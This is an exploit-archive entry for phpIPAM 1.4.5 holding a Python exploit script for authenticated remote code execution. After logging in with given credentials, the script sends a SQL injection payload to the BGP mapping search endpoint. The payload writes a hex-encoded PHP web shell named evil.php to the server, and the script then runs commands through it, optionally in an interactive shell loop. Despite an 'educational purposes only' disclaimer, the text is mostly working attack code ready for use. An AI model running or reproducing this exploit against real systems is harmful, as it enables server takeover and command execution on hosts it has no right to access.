Exploits / Vulnerability Discovered : 2022-06-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Phpipam 1.4.5 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
# Validating url
if url.endswith("/"):
url = url[:-1]
if not url.startswith("http://") and not url.startswith("https://"):
print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow"))
exit()
def login(url, username, password):
"""Takes an username and a password and tries to execute a login (IPAM)"""
data = {
"ipamusername": username,
"ipampassword": password
}
print(colored(f"[...] Trying to log in as {username}", "blue"))
r = requests.post(f"{url}/app/login/login_check.php", data=data)
if "Invalid username or password" in r.text:
print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red"))
exit()
else:
print(colored("[+] Login successful!", "green"))
return str(r.cookies['phpipam'])
auth_cookie = login(url, username, password)
def exploit(url, auth_cookie, path, command):
print(colored("[...] Exploiting", "blue"))
vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php"
data = {
"subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -",
"bgp_id": "1"
}
cookies = {
"phpipam": auth_cookie
}
requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies)
test = requests.get(f"{url}/evil.php")
if test.status_code != 200:
return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools§ion=routing&subnetId=bgp&sPage=1", "red"))
if "--shell" in argv:
while True:
command = input("Shell> ")
r = requests.get(f"{url}/evil.php?cmd={command}")
print(r.text)
else:
print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green"))
r = requests.get(f"{url}/evil.php?cmd={command}")
print(f"\n\n[+] Output:\n{r.text}")